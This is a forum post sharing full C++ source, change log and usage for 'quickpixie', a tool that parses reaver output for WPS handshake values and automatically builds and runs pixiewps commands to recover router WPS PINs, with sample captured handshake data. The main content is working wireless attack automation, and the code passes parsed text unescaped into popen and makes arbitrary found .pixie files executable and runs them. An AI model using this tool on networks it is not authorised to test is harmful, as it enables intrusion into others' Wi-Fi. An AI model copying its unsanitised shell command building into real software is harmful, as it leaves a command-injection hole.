Search the Community

Change log: [v1.1] *Added .pixie files that are saved with the latest reaver's -H option as an acceptable input file with -i (ex. -i /path/to/bssid.pixie) They are treated differently than text files containing pixie data to be parsed, as they are simply set to be executable and then executed since the command is already built at the end of files in the .pixie format and in executable form. *Added -pd / --pixie-dir option which allows you to scan through a directory and all subdirectories within it for .pixie files to execute and/or text files containing pixie data to parse. This expands on the usefulness of the application by making it easier to get pixie data into it! *Added -pe / --pixie-exts option that lets you filter the files which the -pd option will even look at by extension. So for example if you have only .pixie files and .txt files containing pixie data you can prevent it from opening up just any file *.* (which is the default with --pixie-dir option) *Fix: Small Diffie Hellman doesn't have to be specified and shouldn't unless you know all your files containing pixie data all use small diffie hellman, it is determined that if pkr isn't set up to the point where it's about to execute, it assumes small diffie hellman. *Reorganized and cleaned up the code a bit Thanks to ephemient from stackoverflow for the clean and concise directory searching code. root@kali:~/codeblocks/quickpixie# ./quickpixie -h quickpixie 1.1 ~ AlfAlfa quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver. It then uses those arguments to build the command to execute as well as executing it automatically... Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files -i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard. -pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs. -pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension -S is for small diffie hellman (PKR not needed) -b or --e-bssid is for passing a bssid to pixiewps if needed -f or --force is for --force -j or --just-display only prints the command(s) without executing -v is for most verbose output (-v 3) usage: quickpixie -f (pass --force to pixiewps) quickpixie -j (just display the generated command(s) but don't execute) quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file) quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option) quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data) quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data) pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie) In action with main mode (uses clipboard): http://webmshare.com/nrGXa Usually we use reaver with the -K 1 switch so reaver automatically does the pixie attack for us. However sometimes you might be running pixiewps manually and if you have done so, you know it's kind of a pain to build up the command copying and pasting the pke, pkr, ehash1, ehash2, and authkey one by one... So I created quickpixie to get around that! If you copy the whole block all the way from at least the PKE field to the E-Hash2 field you'll have the minimum required to run pixiewps. Then just run pixiewps and it builds and runs the command for you! :) I recommend also including the enonce as well even though it's optional as it can help and now it's no more trouble to do so(just start copying from enonce instead of pke). If there are multiple concatenations of usable pixiewps data, it also handles as many as you can throw at it. When using an input file "-i" instead, it ignores the clipboard and uses pixie data from that file to generate and execute pixiewps commands. You can also specify to use stdin instead of a regular file so you can pipe the output of another application and use it as input to generate pixiewps command lines from :D similar to: (piping words from crunch to aircrack) crunch 8 8 0123456789 | aircrack-ng MY-AP*.cap -w - You can: (round about way of doing "quickpixie -i multi-pixie.txt" cat multi-pixie.txt | quickpixie -i - and: (round about way of doing almost the same as just "quickpixie" with no arguments) xclip -selection clipboard -o | quickpixie -i - The best thing you could do with that is if you had a cool application that outputs data needed for pixie attacks maybe from your pixie attack cluster and you feed that into quickpixie for batch processing automated pixie attacking ;) Prerequisites: (* == comes with kali) pixiewps * xclip* (for standard mode which reads from the clipboard) g++ * (to compile it) Install: 1. download and move "quickpixie.cpp" to somewhere 2. cd to that location 3. g++ -std=c++0x -o quickpixie quickpixie.cpp (optional 4: cp quickpixie /usr/bin/quickpixie {recommended so you can execute it from anywhere}) Now from that directory execute it: ./quickpixie (or just quickpixie if you copied it to /usr/bin) Output of quickpixie with no arguments when example below was on the clipboard! Was on clipboard: PKE: 20:2a:5f:30:66:da:4d:25:9a:f3:72:09:b4:94:25:6a:5b:bc:87:49:27:64:ee:2f:c9:ad:b7:d6:33:7c:5c:b3:61:9d:7d:57:2a:9c:43:16:70:aa:0f:5e:71:20:da:f1:07:db:7e:71:db:3c:1e:32:2a:44:f9:f5:56:5d:ed:70:03:3c:e5:2d:59:34:ab:8b:36:1d:cc:cb:4c:87:bd:12:61:43:a3:05:c9:b4:79:8c:42:9e:12:6a:04:33:58:68:28:21:fd:2d:b0:b0:d0:cf:ab:23:f6:be:65:f7:6f:69:32:f3:4a:24:10:c9:72:48:9e:38:fa:1d:36:3b:65:95:73:93:c4:af:8f:86:04:77:3c:d8:ba:3a:c7:00:fc:a8:a1:c3:c7:74:aa:8b:ff:1d:f6:fd:6b:e1:a0:3d:0d:bf:82:49:3b:e1:a7:7b:f8:b3:95:9c:b0:bf:5d:99:e5:7e:80:6c:ee:4c:cb:46:f9:49:69:3e:35:c8:03:05:cf:6a [P] WPS Manufacturer: Ralink Technology, Corp. [P] WPS Model Name: Ralink Wireless Access Point [P] WPS Model Number: RTXXXX [P] Access Point Serial Number: XXXXXXXX [+] Received M1 message [P] R-Nonce: 00:bd:d0:7c:6e:74:47:4d:b4:e9:ba:56:20:03:62:d1 [P] PKR: 11:97:bc:f9:42:c0:ce:4b:07:09:1e:12:50:0b:bb:e1:8e:7d:0f:ef:98:a8:f9:95:a8:de:e3:7d:a9:e8:2d:2a:07:06:b7:2b:f3:17:2a:b9:f6:70:24:f4:89:9f:be:51:b7:df:90:d8:23:40:bd:36:8d:ef:1c:cd:ac:6a:1a:98:b4:fa:1c:d6:b0:39:e1:09:dd:18:e5:ea:6d:b3:d9:0c:92:f3:10:39:4f:60:36:ea:07:1d:4e:a0:74:2c:6d:d6:6b:6f:f5:41:2c:bb:a1:9f:95:00:cd:1b:b0:61:00:7b:47:03:37:15:6d:fb:43:a8:5d:60:6e:65:b2:10:e5:d8:d8:14:58:48:c4:4e:74:15:5d:ab:68:37:68:04:dc:fc:5b:3a:bd:dc:00:8a:59:ae:53:c0:98:75:06:0f:ed:80:5e:7d:b3:39:dd:12:ea:36:c2:52:47:46:c5:8b:59:ee:f2:90:e4:77:45:c7:dd:19:fa:3e:cd:90:50:f0:55:57 [P] AuthKey: 4b:d8:3f:55:aa:15:0a:33:e6:3a:03:b7:c8:c0:6e:51:dc:e6:50:98:33:d6:4c:63:5f:c8:5f:bf:ca:1c:a2:de [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: 6b:2c:c1:b4:78:da:a4:e9:78:8c:96:8d:b0:85:68:51:ad:4c:43:84:9f:77:38:20:7a:5c:51:7d:94:d8:a9:69 [P] E-Hash2: 2e:db:1d:8f:f8:a6:34:5f:70:2c:33:c2:7e:28:17:45:65:5c:85:6c:17:d4:c5:fc:f7:9d:e8:98:89:b1:4c:33 quickpixie.cpp /* 12.24.2015 ~ AlfAlfa | quickpixie 1.1 Updated: 02.06.2016 */ #include <sys/stat.h> #include <ftw.h> #include <fnmatch.h> #include <string.h> #include <iostream> #include <memory> #include <vector> std::string enonce, rnonce, pke, pkr, authkey, ehash1, ehash2, optional_arguments, input_file, pixieDir; std::vector<std::string> pixieExts; bool just_display = false, small_diffie_hellman = false, most_verbose = false, piped_input = false, using_clipboard = true, using_pixie_dir = false; size_t pixiecount = 0; class ProcessExecutor { private: static std::unique_ptr<ProcessExecutor> mainInstance; public: FILE *file; std::string output; char buffer[4096]; ProcessExecutor() { memset(buffer, 0, sizeof(buffer)); } static std::unique_ptr<ProcessExecutor> make() { return std::unique_ptr<ProcessExecutor>(new ProcessExecutor()); } static ProcessExecutor *get() { if(!mainInstance.get()) mainInstance = make(); return mainInstance.get(); } int run(const char *cmd, bool printout = false) { file = popen(cmd,"r"); if(!file) return 1; output.clear(); while(fgets(buffer, sizeof(buffer), file) != 0) { output += buffer; if(printout) std::cout << buffer; } if(printout) std::cout << "\n"; pclose(file); return 0; } }; std::unique_ptr<ProcessExecutor> ProcessExecutor::mainInstance; class KeyValueGrabber { private: std::string *keysandvalues; public: size_t currentPosition, wouldBeNextPos, lastKeyPos; KeyValueGrabber() { currentPosition = 0; } std::string valueForKey(const char *key) { if(key != 0 && keysandvalues->length() > 0) { size_t valueStartPos = lastKeyPos = keysandvalues->find(key, currentPosition); if(valueStartPos != std::string::npos) { valueStartPos += strlen(key); size_t valueEndPos = keysandvalues->find("\n",valueStartPos); if(valueEndPos == std::string::npos) valueEndPos = keysandvalues->length(); wouldBeNextPos = valueEndPos + 1; return keysandvalues->substr(valueStartPos, (valueEndPos - valueStartPos)); } } return std::string(""); } size_t movePosition(size_t newPos = 0) { if(newPos == 0) currentPosition = wouldBeNextPos; else currentPosition = newPos; return lastKeyPos; } void resetPosition() { currentPosition = 0; } void set(std::string *p) { keysandvalues = p; } }; class QuickPixie { public: static void buildAndExecute() { std::string pixiecommand = "pixiewps -e " + pke; if(!pkr.empty()) pixiecommand += " -r " + pkr; pixiecommand += " -s " + ehash1 + " -z " + ehash2 + " -a " + authkey; if(!enonce.empty()) pixiecommand += " -n " + enonce; if(!rnonce.empty()) pixiecommand += " -m " + rnonce; if(!optional_arguments.empty()) pixiecommand += optional_arguments; //If small diffie hellman isn't set for every command, but pkr is still empty at this point, just assume small diffie hellman... if(!small_diffie_hellman && pkr.empty()) pixiecommand += " -S"; std::cout << "{" << ++pixiecount << "}\n" << pixiecommand << "\n\n"; if(!just_display) { auto pixiewps = ProcessExecutor::make(); pixiewps->run(pixiecommand.c_str(), true); } } static void executePixieFile(std::string pixieFilePath) { if(most_verbose) std::cout << "Executing pixie file: " << pixieFilePath << "\n"; chmod(pixieFilePath.c_str(), S_IRWXU); //set executable for owner //then execute it! if(pixieFilePath.find('/') == std::string::npos) ProcessExecutor::make()->run(("./" + pixieFilePath).c_str(), true); else ProcessExecutor::make()->run(pixieFilePath.c_str(), true); } static int parseTextFile(std::string pixieTextFilePath) { FILE *pixieTextFile = fopen(pixieTextFilePath.c_str(), "r"); if(!pixieTextFile) { std::cout << "ERROR: Could not open input file \"" << pixieTextFilePath << "\"\n"; return 1; } if(most_verbose) std::cout << "Parsing file for pixie data: " << pixieTextFilePath << "\n"; return parseTextFile(pixieTextFile); } static int parseTextFile(FILE *pixieTextFile) { if(!pixieTextFile) { std::cout << "ERROR: No file passed in to parseTextFile member function"; return 1; } std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); std::string currentLine; kv->set(&currentLine); while(fgets(exec->buffer, sizeof(exec->buffer), pixieTextFile) != 0) { currentLine = exec->buffer; std::string enonce = kv->valueForKey("E-Nonce: "); std::string pke = kv->valueForKey("PKE: "); std::string rnonce = kv->valueForKey("R-Nonce: "); std::string pkr = kv->valueForKey("PKR: "); std::string authkey = kv->valueForKey("AuthKey: "); std::string ehash1 = kv->valueForKey("E-Hash1: "); std::string ehash2 = kv->valueForKey("E-Hash2: "); if(!enonce.empty()) ::enonce = enonce; else if(!pke.empty()) ::pke = pke; else if(!rnonce.empty()) ::rnonce = rnonce; else if(!pkr.empty()) ::pkr = pkr; else if(!authkey.empty()) ::authkey = authkey; else if(!ehash1.empty()) ::ehash1 = ehash1; else if(!ehash2.empty()) ::ehash2 = ehash2; if(!(::pke.empty() || ::authkey.empty() || ::ehash1.empty() || ::ehash2.empty())) { buildAndExecute(); clear(); } } fclose(pixieTextFile); return 0; } static void parseClipboard() { if(most_verbose) std::cout << "Parsing pixie data from clipboard\n"; std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); exec->run("xclip -selection clipboard -o"); if(most_verbose) std::cout << exec->output << "\n\n"; kv->set(&exec->output); size_t pos = 0; while(pos != std::string::npos) { //optional arguments enonce = kv->valueForKey("E-Nonce: "); rnonce = kv->valueForKey("R-Nonce: "); //required arguments pke = kv->valueForKey("PKE: "); pkr = kv->valueForKey("PKR: "); authkey = kv->valueForKey("AuthKey: "); ehash1 = kv->valueForKey("E-Hash1: "); ehash2 = kv->valueForKey("E-Hash2: "); pos = kv->movePosition(); if(pos == std::string::npos) break; if(pke.empty() || authkey.empty() || ehash1.empty() || ehash2.empty()) { std::cout << "ERROR: Your copied to clipboard input for pixiewps is missing a required argument...\n"; std::cout << "PKE, PKR, E-Hash1, E-Hash2, and AuthKey are all required arguments.(except PKR when -S is used)\n"; std::cout << "You have:\n" << "PKE: " << pke << "\n" << "PKR: " << pkr << "\n" << "E-Hash1: " << ehash1 << "\n" << "E-Hash2: " << ehash2 << "\n" << "AuthKey: " << authkey << "\n"; continue; } buildAndExecute(); clear(); } } static std::string extensionOf(std::string filePath) { if(!filePath.empty()) { size_t ePos = filePath.rfind('.'); if(ePos != std::string::npos) { ePos++; return filePath.substr(ePos, filePath.length() - ePos); } } return std::string(""); } static void clear() { pke.clear(); pkr.clear(); authkey.clear(); ehash1.clear(); ehash2.clear(); enonce.clear(); rnonce.clear(); } }; //Thanks to ephemient from stackoverflow for this static int directorySearchCallback(const char *fpath, const struct stat *sb, int typeflag) { /* if it's a file */ if(typeflag == FTW_F) { /* for each filter, */ for(size_t i = 0; i < pixieExts.size(); i++) { /* if the filename matches the filter, */ if(fnmatch(pixieExts[i].c_str(), fpath, FNM_CASEFOLD) == 0) { if(QuickPixie::extensionOf(fpath) == "pixie") QuickPixie::executePixieFile(fpath); else QuickPixie::parseTextFile(fpath); break; } } } /* tell ftw to continue */ return 0; } int main(int argcount, char *args[]) { std::cout << "quickpixie 1.1 ~ AlfAlfa\n\n"; for(int i = 0; i < argcount; i++) { if(strcmp(args[i], "-j") == 0 || strcmp(args[i], "--just-display") == 0) just_display = true; else if(strcmp(args[i], "-f") == 0 || strcmp(args[i], "--force") == 0) optional_arguments += " --force"; else if(strcmp(args[i], "-S") == 0) { optional_arguments += " -S"; small_diffie_hellman = true; } else if(strcmp(args[i], "-v") == 0) { optional_arguments += " -v 3"; most_verbose = true; } else if(strcmp(args[i], "-b") == 0 || strcmp(args[i], "--e-bssid") == 0) { if(i == (argcount - 1)) break; optional_arguments += " -b "; optional_arguments += args[i+1]; } else if(strcmp(args[i], "-i") == 0 || strcmp(args[i], "--input") == 0) { if(i == (argcount - 1)) break; input_file = args[i+1]; if(input_file == "-") piped_input = true; using_clipboard = false; } else if(strcmp(args[i], "-pd") == 0 || strcmp(args[i], "--pixie-dir") == 0) { if(i == (argcount - 1)) break; pixieDir = args[i+1]; using_pixie_dir = true; } else if(strcmp(args[i], "-pe") == 0 || strcmp(args[i], "--pixie-exts") == 0) { if(i == (argcount - 1)) break; int z = i; while(*args[++z] != '-') { pixieExts.push_back(std::string("*.") + args[z]); if(z == (argcount - 1)) break; } } else if(strcmp(args[i], "-h") == 0 || strcmp(args[i], "--help") == 0) { std::cout << "quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver.\n"; std::cout << "It then uses those arguments to build the command to execute as well as executing it automatically...\n"; std::cout << "Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files\n"; std::cout << "-i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard.\n"; std::cout << "-pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs.\n"; std::cout << "-pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension\n"; std::cout << "-S is for small diffie hellman (PKR not needed)\n"; std::cout << "-b or --e-bssid is for passing a bssid to pixiewps if needed\n"; std::cout << "-f or --force is for --force\n"; std::cout << "-j or --just-display only prints the command(s) without executing\n"; std::cout << "-v is for most verbose output (-v 3)\n"; std::cout << "usage:\nquickpixie -f (pass --force to pixiewps)\n"; std::cout << "quickpixie -j (just display the generated command(s) but don't execute)\n"; std::cout << "quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file)\n"; std::cout << "quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option)\n"; std::cout << "quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data)\n"; std::cout << "quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data)\n"; std::cout << "pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie)\n"; return 2; } } if(using_pixie_dir) { if(pixieExts.empty()) pixieExts.push_back("*.*"); if(most_verbose) { std::cout << "Filtering by extensions: {"; for(size_t i = 0; i < pixieExts.size(); i++) { std::cout << " " << pixieExts[i]; if(i != (pixieExts.size() - 1)) std::cout << ","; } std::cout << " }\n"; } ftw(pixieDir.c_str(), directorySearchCallback, 16); } else if(using_clipboard) QuickPixie::parseClipboard(); else { FILE *file = stdin; if(!piped_input) { file = fopen(input_file.c_str(),"r"); if(!file) { std::cout << "ERROR: Could not open input file \"" << input_file << "\"\n"; return 1; } fclose(file); if(QuickPixie::extensionOf(input_file) == "pixie") { QuickPixie::executePixieFile(input_file); return 0; } } QuickPixie::parseTextFile(file); } return 0; } Hope this is useful to you, happy holidays! :)